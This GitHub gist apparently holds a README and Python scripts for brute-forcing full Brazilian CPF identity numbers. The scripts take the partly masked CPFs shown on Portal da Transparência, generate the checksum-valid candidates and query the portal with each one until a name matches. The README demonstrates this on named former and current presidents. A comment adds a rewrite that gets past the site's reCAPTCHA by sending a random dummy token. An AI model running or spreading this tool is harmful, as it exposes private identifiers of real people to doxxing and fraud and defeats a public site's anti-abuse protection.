Skip to content

Instantly share code, notes, and snippets.

@pedrogarciafreitas
Last active August 21, 2025 22:22
Show Gist options
  • Save pedrogarciafreitas/eb0b7915fc08e5d0267b61230c679a64 to your computer and use it in GitHub Desktop.
Save pedrogarciafreitas/eb0b7915fc08e5d0267b61230c679a64 to your computer and use it in GitHub Desktop.
Script to discover the whole CPF from portaldatransparencia.gov.br

BRUTE FORCE CPF FINDER

The CPF (Cadastro de Pessoas Físicas) is an identification document used in Brazil. It is a unique and individual number assigned to each Brazilian citizen. It is used for identification in various situations, such as opening bank accounts, making purchases, contracting services, among others. To obtain a CPF, it is necessary to register with the Federal Revenue Service.

This script uses one of the main services of the Brazilian federal government to discover information based on the registered citizen's name. It relies on the vulnerability of the Portal da Transparência, which exposes part of the citizen's CPF and censors only the first 3 digits and the verification digits. Since the CPF follows a restricted pattern of digits, by exposing 6 out of a total of 11 digits, the Transparency Portal reduces the number of combinations to 100,000. However, since the CPF uses the last 2 digits for verification of the previous 9, it is possible to reduce the space of possibilities to only 1,000 combinations, which is quite feasible for a brute force attack.

Meaning of the CPF Digits

The CPF consists of 11 digits and has a specific meaning for each one of them. A common representation of the CPF consists of grouping the first nine digits into three groups of three digits separated by a period, followed by a hyphen and the last two digits. Thus, the CPF number ABCDEFGHIJK is formatted as ABC.DEF.GHI-JK. In this case, the digits represented by J and K are used as verification digits.

Each digit of the CPF has a specific meaning. The first eight digits, ABCDEFGH, form the base number defined by the Federal Revenue Service at the time of registration. The ninth digit, I, defines the region where the CPF was issued. The tenth digit is the first verification digit. The eleventh digit is the second verification digit.

How Verification Digits Work

The first verification digit, J, is the verification digit for the first nine digits. The second verification digit, K, is the verification digit for the nine digits before it. The first nine digits are sequentially multiplied by the sequence {10, 9, 8, 7, 6, 5, 4, 3, 2} (the first by 10, the second by 9, and so on). Then, the remainder R of the division of the sum of the multiplication results by 11 is calculated. If the remainder is 0 or 1, the first digit is zero (i.e., J=0); otherwise, J=11 - R.

The second Verification Digit, K, is calculated by the same rule, where the numbers to be multiplied by the sequence {10, 9, 8, 7, 6, 5, 4, 3, 2} are counted starting from the second digit, with J now being the last digit. If S is the remainder of the division by 11 of the sum of the multiplications, then K will be 0 if S is 0 or 1. Otherwise, K=11-S.

How the Script Works

This script has 2 command-line parameters: --name (mandatory) and --keyword. The --name parameter should contain the full name of the citizen whose CPF you want to discover. If this full name is unique in the database, the script will handle downloading and parsing the partial CPF provided by the Portal da Transparência. Based on this partial CPF, the script generates all possible combinations, finds those valid according to the CPF validation algorithm described above, and then attempts, through brute force, to make a series of requests based on this generated and validated CPF. If the CPF exists in the database, the script notifies. The program stops when the found full name matches the name passed via the --name parameter.

For example, suppose you want to find the CPF of the president of Brazil, Mr. Luiz Inácio Lula da Silva:

python script.py  --name "LUIZ INACIO LULA DA SILVA"

After perform many attempts, the script will report all found CPFs in Portal da Transparência and then stops when the discovered CPF will correspond to the same name passed through --name.

Parameter --keyword: when the full name of the citizen whose CPF you want to discover is unique in the database, the above command is sufficient. However, in some cases, there may be homonymous or very similar names. In these cases, it is possible to pass the pattern of the partial CPF provided by the Transparency Portal itself (e.g., ***.680.938-**). In this case, you should provide the full name (i.e., parameter --name) as well as the --keyword parameter. Thus, the --keyword parameter will be used as the search criterion, and the `--name parameter as the stop criterion.

For instance, suppose you want to discover the complete CPF of the former president of Brazil, Ms. Dilma Vana Rousseff, knowing that part of her CPF is ***.267.246-**, as provided by the Portal da Transparência:

python script.py  --name "DILMA VANA ROUSSEFF" --keyword "***.267.246-**"

Example of execution of this script available in the video: https://youtu.be/c13g8o0wMJs.

import argparse
import re
import copy
from itertools import product
from dataclasses import dataclass
from absl import app
from absl.flags import argparse_flags
from fake_headers import Headers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import TimeoutException
from tqdm import tqdm
@dataclass
class Person:
name: str
CPF: str
status: str
def __init__(self, name, cpf, status):
self.name = name
self.CPF = cpf
self.status = status
def extract_single_person_pattern_match(match):
name = match.group('name').strip()
cpf = match.group('cpf')
status = match.group('status').strip()
person = Person(name, cpf, status)
return person
def extract_person_info(text):
# Define regex patterns to extract name, CPF, and status
name_pattern = r'(?P<name>[A-Z\s]+)\n'
cpf_pattern = r'CPF (?P<cpf>\*{3}\.\d{3}\.\d{3}-\*\*)\n'
status_pattern = r'(?P<status>.+?)(?=\n[A-Z]|$)'
pattern = name_pattern + cpf_pattern + status_pattern
matches = re.finditer(pattern, text)
person_info_list = [extract_single_person_pattern_match(match)
for match in matches]
return person_info_list
def is_valid_cpf(cpf):
cpf = [int(char) for char in cpf if char.isdigit()]
if len(cpf) != 11:
return False
if cpf == cpf[::-1]:
return False
# Valida os dois dígitos verificadores
for i in range(9, 11):
value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
digit = ((value * 10) % 11) % 10
if digit != cpf[i]:
return False
return True
def extract_cpf_parts(cpf):
# Regular expression pattern to extract CPF parts
pattern = r'(\*\*\*).(\d{3}).(\d{3})-(\*\*)'
match = re.match(pattern, cpf)
if match:
first_part = match.group(1)
second_part = match.group(2)
third_part = match.group(3)
last_part = match.group(4)
return first_part, second_part, third_part, last_part
else:
return None
def get_combinations():
triplets = [''.join(map(str, c)) for c in product(range(10), repeat=3)]
tuples = [''.join(map(str, c)) for c in product(range(10), repeat=2)]
combinations = product(triplets, tuples)
return combinations
def get_all_cpfs_by_bruteforce(second_part, third_part):
all_combinations = get_combinations()
all_cpfs = []
for first_part, validation_digit in all_combinations:
parts = (first_part, second_part, third_part, validation_digit)
generated_cpf = "".join(parts)
all_cpfs.append(generated_cpf)
return all_cpfs
def get_all_valid_cpfs(second_part, third_part):
all_cpfs = get_all_cpfs_by_bruteforce(second_part, third_part)
valid_cpfs = [c for c in all_cpfs if is_valid_cpf(c)]
return valid_cpfs
class CPFFinder:
url = "https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?"
def __init__(self, name: str, keyword: str):
self.name = name
self.keyword = keyword
self.url = CPFFinder.url
self._start_crawler()
def _start_crawler(self):
header = Headers(browser="chrome", os="win", headers=False)
customUserAgent = header.generate()['User-Agent']
options = ChromeOptions()
options.add_argument('--headless')
options.add_argument("--enable-javascript")
options.add_argument(f"user-agent={customUserAgent}")
self.driver = webdriver.Chrome(options=options)
def _get_remote_info(self, keyword: str, wait_seconds: int = 5):
driver = copy.copy(self.driver)
driver.get(self.url)
input_field = driver.find_element(By.ID, "termo")
button = driver.find_element(By.ID, "btnBuscar")
input_field.send_keys(f"\"{keyword}\"")
input_field.send_keys(Keys.ENTER)
button.click()
try:
wait = WebDriverWait(driver, wait_seconds)
dynamic_content = wait.until(
EC.visibility_of_element_located((By.ID, "resultados")))
results = extract_person_info(dynamic_content.text)
return results
except TimeoutException:
return self._get_remote_info(keyword, wait_seconds + 10)
def _try_single_cpf(self, cpf):
results = self._get_remote_info(cpf)
if len(results) == 1:
found_person = Person(results[0].name, cpf, results[0].status)
print(f"{found_person} exists in DB.")
if self.name.lower() == found_person.name.lower():
return found_person
return None
def _try_cpfs_by_bruteforce(self, incomplete_cpf):
_, second_part, third_part, _ = extract_cpf_parts(incomplete_cpf)
valid_cpfs = get_all_valid_cpfs(second_part, third_part)
for cpf in (pbar := tqdm(valid_cpfs)):
pbar.set_description(f"Trying CPF {cpf}")
result = self._try_single_cpf(cpf)
if result:
return result
return None
def run(self):
if self.keyword is None:
results = self._get_remote_info(self.name)
if len(results) != 1:
msg = "Many results with this pattern."
msg += "Try a more specific one."
print(msg)
else:
incomplete_cpf = results[0].CPF
else:
incomplete_cpf = self.keyword
print(f"Parcial CPF: {incomplete_cpf}")
matched_person = self._try_cpfs_by_bruteforce(incomplete_cpf)
if matched_person:
print(f"Found -> {matched_person}")
def parse_args(argv):
parser = argparse_flags.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'--name',
type=str,
help='Nome completo da pessoa que se deseja descobrir o CPF',
)
parser.add_argument(
'--keyword',
type=str,
help='CPF parcial da pessoa',
default=None
)
return parser.parse_args(argv[1:])
def main(args):
CPFFinder(args.name, args.keyword).run()
if __name__ == "__main__":
app.run(main, flags_parser=parse_args)
@fell-lucas
Copy link

Thanks, your script was a great starting point. I've made some changes to reduce the installation complexity: No dependencies, only libraries from Python standard lib.

It works (for now) because we don't really need to pass reCaptcha, the website accepts any randomly generated token.

python3 cpf.py --help
usage: cpf.py [-h] --name NAME --keyword KEYWORD [--check-portal] [--similarity-threshold SIMILARITY_THRESHOLD] [--debug]

import argparse
import re
import time
import urllib.request
import urllib.parse
import gzip
import json
import http.cookiejar
from itertools import product
from difflib import SequenceMatcher

def is_valid_cpf(cpf):
    cpf = [int(char) for char in cpf if char.isdigit()]

    if len(cpf) != 11:
        return False

    if cpf == cpf[::-1]:
        return False

    #  Valida os dois dígitos verificadores
    for i in range(9, 11):
        value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
        digit = ((value * 10) % 11) % 10
        if digit != cpf[i]:
            return False
    return True


def extract_cpf_parts(cpf_pattern):
    """
    Extract known digits from CPF pattern like '***.228.988-**'
    Returns tuple of (known_positions, known_digits)
    """
    # Remove dots and dashes for easier processing
    clean_pattern = cpf_pattern.replace('.', '').replace('-', '')

    known_positions = []
    known_digits = []

    for i, char in enumerate(clean_pattern):
        if char.isdigit():
            known_positions.append(i)
            known_digits.append(int(char))

    return known_positions, known_digits


def generate_cpf_candidates(cpf_pattern):
    """
    Generate all possible CPF candidates based on the pattern.
    Pattern example: '***.228.988-**'
    """
    known_positions, known_digits = extract_cpf_parts(cpf_pattern)

    # Generate all possible 11-digit combinations
    candidates = []

    # We need to fill 11 positions total
    unknown_positions = [i for i in range(11) if i not in known_positions]

    # Generate all combinations for unknown positions
    for unknown_combo in product(range(10), repeat=len(unknown_positions)):
        cpf_digits = [0] * 11

        # Fill known positions
        for pos, digit in zip(known_positions, known_digits):
            cpf_digits[pos] = digit

        # Fill unknown positions
        for pos, digit in zip(unknown_positions, unknown_combo):
            cpf_digits[pos] = digit

        # Convert to string
        cpf_str = ''.join(map(str, cpf_digits))
        candidates.append(cpf_str)

    return candidates


def get_valid_cpfs_from_pattern(cpf_pattern):
    """
    Generate all valid CPFs that match the given pattern.
    """
    candidates = generate_cpf_candidates(cpf_pattern)
    valid_cpfs = [cpf for cpf in candidates if is_valid_cpf(cpf)]
    return valid_cpfs


def format_cpf(cpf_str):
    """Format CPF string with dots and dash: 12345678901 -> 123.456.789-01"""
    return f"{cpf_str[:3]}.{cpf_str[3:6]}.{cpf_str[6:9]}-{cpf_str[9:11]}"


def normalize_name(name):
    """Normalize name for comparison by removing accents, extra spaces, and converting to lowercase"""
    import unicodedata
    # Remove accents
    name = unicodedata.normalize('NFD', name)
    name = ''.join(char for char in name if unicodedata.category(char) != 'Mn')
    # Convert to lowercase and remove extra spaces
    return ' '.join(name.lower().split())


def calculate_name_similarity(name1, name2):
    """Calculate similarity between two names using SequenceMatcher"""
    name1_norm = normalize_name(name1)
    name2_norm = normalize_name(name2)
    return SequenceMatcher(None, name1_norm, name2_norm).ratio()


class PortalSession:
    """Manages session and tokens for Portal da Transparência requests"""

    def __init__(self, debug=False):
        self.cookie_jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
        self.session_token = None
        self.recaptcha_token = None
        self._debug = debug

    def get_tokens_from_page(self, cpf_formatted):
        """Extract tokens from the main search page"""
        url = f"https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?termo={urllib.parse.quote(cpf_formatted)}&pagina=1&tamanhoPagina=10"

        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Sec-Fetch-Dest': 'document',
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-Site': 'none',
            'Cache-Control': 'no-cache',
            'Pragma': 'no-cache',
        }

        req = urllib.request.Request(url, headers=headers)

        try:
            with self.opener.open(req, timeout=15) as response:
                raw_content = response.read()

                # Handle gzipped content
                if response.headers.get('Content-Encoding') == 'gzip':
                    content = gzip.decompress(raw_content).decode('utf-8')
                else:
                    content = raw_content.decode('utf-8')

                # Extract tokens from the page
                # Look for the 't' parameter (session token) in the JavaScript
                t_match = re.search(r"let token = ['\"]&t=([^'\"]+)['\"]", content)
                if t_match:
                    self.session_token = t_match.group(1)

                # Look for recaptcha site key to generate token later
                recaptcha_key_match = re.search(r"grecaptcha\.execute\(['\"]([^'\"]+)['\"]", content)
                if recaptcha_key_match:
                    # For now, we'll skip the recaptcha token since it requires JavaScript execution
                    # The portal might work without it or with a dummy token
                    pass

                # Debug: save content to see what we're getting
                if hasattr(self, '_debug') and self._debug:
                    with open('/tmp/portal_content.html', 'w') as f:
                        f.write(content)
                    print(f"    Debug: Saved page content to /tmp/portal_content.html")

                return True

        except Exception as e:
            print(f"Error getting tokens: {e}")
            return False


def check_cpf_in_portal(cpf_formatted, target_name, similarity_threshold=0.8, debug=False):
    """
    Check if CPF exists in Portal da Transparência using the AJAX endpoint
    Returns tuple: (found, matched_name, similarity_score)
    """
    session = PortalSession(debug)

    try:
        # First, get the tokens from the main page
        if not session.get_tokens_from_page(cpf_formatted):
            if debug:
                print(f"    Debug: Failed to get tokens for {cpf_formatted}")
            return False, None, 0

        # Build the AJAX request URL
        params = {
            'termo': cpf_formatted,
            'pagina': '1',
            'tamanhoPagina': '10'
        }

        if session.session_token:
            params['t'] = session.session_token

        # Try with a dummy recaptcha token if we don't have a real one
        if session.recaptcha_token:
            params['tokenRecaptcha'] = session.recaptcha_token
        else:
            # Generate a dummy recaptcha token (this might not work, but worth trying)
            import random
            import string
            dummy_token = ''.join(random.choices(string.ascii_letters + string.digits + '_-', k=200))
            params['tokenRecaptcha'] = dummy_token

        url = f"https://portaldatransparencia.gov.br/pessoa-fisica/busca/resultado?{urllib.parse.urlencode(params)}"

        if debug:
            print(f"    Debug: Making request to {url}")
            print(f"    Debug: Session token: {session.session_token[:20] + '...' if session.session_token else 'None'}")
            print(f"    Debug: Recaptcha token: {session.recaptcha_token[:20] + '...' if session.recaptcha_token else 'None'}")

        # Headers for the AJAX request
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
            'X-Requested-With': 'XMLHttpRequest',
            'Referer': f'https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?termo={urllib.parse.quote(cpf_formatted)}&pagina=1&tamanhoPagina=10',
            'Sec-Fetch-Dest': 'empty',
            'Sec-Fetch-Mode': 'cors',
            'Sec-Fetch-Site': 'same-origin',
            'Cache-Control': 'no-cache',
            'Pragma': 'no-cache',
        }

        req = urllib.request.Request(url, headers=headers)

        with session.opener.open(req, timeout=15) as response:
            raw_content = response.read()

            # Handle gzipped content
            if response.headers.get('Content-Encoding') == 'gzip':
                content = gzip.decompress(raw_content).decode('utf-8')
            else:
                content = raw_content.decode('utf-8')

            if debug:
                print(f"    Debug: Response length: {len(content)} characters")
                print(f"    Debug: Response preview: {content[:200]}...")
                with open('/tmp/portal_response.html', 'w') as f:
                    f.write(content)
                print(f"    Debug: Saved response to /tmp/portal_response.html")

            # Try to parse as JSON first
            try:
                data = json.loads(content)
                found_names = []

                # Extract names from JSON response
                if isinstance(data, dict):
                    # Handle the Portal da Transparência response format
                    if 'registros' in data and isinstance(data['registros'], list):
                        for item in data['registros']:
                            if isinstance(item, dict):
                                # Look for name fields in various possible keys
                                for key in ['nome', 'nomeCompleto', 'nomePessoa', 'pessoa']:
                                    if key in item and isinstance(item[key], str):
                                        found_names.append(item[key])
                                        break
                    # Look for other common JSON structures
                    elif 'data' in data and isinstance(data['data'], list):
                        for item in data['data']:
                            if isinstance(item, dict) and 'nome' in item:
                                found_names.append(item['nome'])
                    elif 'resultados' in data and isinstance(data['resultados'], list):
                        for item in data['resultados']:
                            if isinstance(item, dict) and 'nome' in item:
                                found_names.append(item['nome'])
                    # Look for any field that might contain a name
                    else:
                        for key, value in data.items():
                            if 'nome' in key.lower() and isinstance(value, str) and len(value) > 5:
                                found_names.append(value)

            except json.JSONDecodeError:
                # If not JSON, fall back to HTML parsing
                found_names = []
                name_patterns = [
                    r'<strong[^>]*>([^<]+)</strong>',
                    r'class="[^"]*nome[^"]*"[^>]*>([^<]+)<',
                    r'<td[^>]*>([A-ZÁÀÂÃÉÊÍÓÔÕÚÇ][A-ZÁÀÂÃÉÊÍÓÔÕÚÇa-záàâãéêíóôõúç\s]+)</td>',
                    r'"nome":\s*"([^"]+)"',
                ]

                for pattern in name_patterns:
                    matches = re.findall(pattern, content, re.IGNORECASE)
                    for match in matches:
                        name = match.strip()
                        if len(name) > 5 and not re.match(r'^[\d\s\-\.]+$', name):
                            found_names.append(name)

            # Check if any found name matches the target name
            best_match = None
            best_similarity = 0

            for found_name in found_names:
                similarity = calculate_name_similarity(target_name, found_name)
                if similarity > best_similarity:
                    best_similarity = similarity
                    best_match = found_name

            if best_match and best_similarity >= similarity_threshold:
                return True, best_match, best_similarity
            elif found_names:
                return True, found_names[0] if found_names else None, best_similarity
            else:
                return False, None, 0

    except Exception as e:
        print(f"Error checking CPF {cpf_formatted}: {e}")
        return False, None, 0


class CPFBruteForcer:
    def __init__(self, name: str, keyword: str, check_portal: bool = False, similarity_threshold: float = 0.8, debug: bool = False):
        self.name = name
        self.keyword = keyword
        self.check_portal = check_portal
        self.similarity_threshold = similarity_threshold
        self.debug = debug

    def run(self):
        if not self.keyword:
            print("Error: --keyword argument is required for brute force mode")
            print("Example: python3 cpf.py --name 'DILMA VANA ROUSSEFF' --keyword '***.267.246-**'")
            return

        print(f"Name: {self.name}")
        print(f"CPF Pattern: {self.keyword}")
        print(f"Portal Check: {'Enabled' if self.check_portal else 'Disabled'}")
        if self.check_portal:
            print(f"Name Similarity Threshold: {self.similarity_threshold}")
        print("Generating valid CPFs that match the pattern...")

        try:
            valid_cpfs = get_valid_cpfs_from_pattern(self.keyword)

            if not valid_cpfs:
                print("No valid CPFs found matching the pattern.")
                return

            print(f"\nFound {len(valid_cpfs)} valid CPF(s) matching the pattern.")

            if self.check_portal:
                print("Checking each CPF against Portal da Transparência...")
                print("-" * 70)

                matches_found = 0
                for i, cpf in enumerate(valid_cpfs, 1):
                    formatted_cpf = format_cpf(cpf)
                    print(f"[{i}/{len(valid_cpfs)}] Checking CPF: {formatted_cpf}", end=" ... ")

                    found, matched_name, similarity = check_cpf_in_portal(formatted_cpf, self.name, self.similarity_threshold, self.debug)

                    if found and similarity >= self.similarity_threshold:
                        print(f"✓ MATCH FOUND!")
                        print(f"    Found Name: {matched_name}")
                        print(f"    Similarity: {similarity:.2%}")
                        print(f"    Target Name: {self.name}")
                        matches_found += 1
                    elif found:
                        print(f"✗ Found but low similarity ({similarity:.2%})")
                        if matched_name:
                            print(f"    Found Name: {matched_name}")
                    else:
                        print("✗ Not found")

                    # Add delay to avoid overwhelming the server
                    time.sleep(1)

                print("-" * 70)
                print(f"Search completed. Found {matches_found} matching CPF(s).")
            else:
                print("-" * 50)
                for cpf in valid_cpfs:
                    formatted_cpf = format_cpf(cpf)
                    print(f"Valid CPF: {formatted_cpf}")

        except Exception as e:
            print(f"Error processing CPF pattern: {e}")
            print("Make sure the pattern is in the correct format (e.g., '***.228.988-**')")


def parse_args():
    parser = argparse.ArgumentParser(
        description='CPF Brute Force Tool - Generate valid CPFs from partial patterns and optionally check against Portal da Transparência',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument(
        '--name',
        type=str,
        required=True,
        help='Full name of the person to search for'
    )
    parser.add_argument(
        '--keyword',
        type=str,
        required=True,
        help='Partial CPF pattern (e.g., "***.228.988-**")'
    )
    parser.add_argument(
        '--check-portal',
        action='store_true',
        help='Check each generated CPF against Portal da Transparência'
    )
    parser.add_argument(
        '--similarity-threshold',
        type=float,
        default=0.8,
        help='Minimum name similarity threshold (0.0 to 1.0) for considering a match'
    )
    parser.add_argument(
        '--debug',
        action='store_true',
        help='Enable debug output for portal requests'
    )
    return parser.parse_args()


def main():
    args = parse_args()
    brute_forcer = CPFBruteForcer(
        args.name,
        args.keyword,
        args.check_portal,
        args.similarity_threshold,
        args.debug
    )
    brute_forcer.run()


if __name__ == "__main__":
    main()

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment